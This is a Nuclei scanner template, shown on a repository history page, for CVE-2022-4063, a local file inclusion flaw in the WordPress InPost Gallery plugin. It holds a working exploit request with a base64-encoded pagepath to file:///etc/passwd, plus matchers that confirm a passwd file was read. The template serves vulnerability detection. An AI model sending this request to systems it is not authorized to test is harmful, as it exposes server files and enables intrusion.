nuclei-templates/http/cves/2022/CVE-2022-4063.yaml

54 lines
2.0 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2022-4063
info:
name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
2023-03-05 13:42:10 +00:00
author: theamanrawat
severity: critical
description: |
WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
2023-09-27 15:51:13 +00:00
impact: |
The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 2.1.4.1.
2023-03-05 13:42:10 +00:00
reference:
- https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
- https://wordpress.org/plugins/inpost-gallery/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4063
- https://github.com/cyllective/CVEs
- https://github.com/im-hanzou/INPGer
2023-03-05 13:42:10 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-4063
cwe-id: CWE-22
epss-score: 0.04425
epss-percentile: 0.92213
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: pluginus
product: inpost_gallery
2023-09-06 11:59:08 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus
2023-03-05 13:42:10 +00:00
http:
2023-03-05 13:42:10 +00:00
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
2023-07-11 19:49:27 +00:00
- type: regex
part: body
regex:
- "root:.*:0:0:"
2023-03-05 13:42:10 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022001c30dda208f23934117d6648b68a7cbc6063bd9487648f9d3cb3f954c8fb469022100eb1c85cee64fa01d404510e98f5b9c0975e3511b85a8e515435a7dce0084aef8:922c64590222798bb761d5b6d8e72950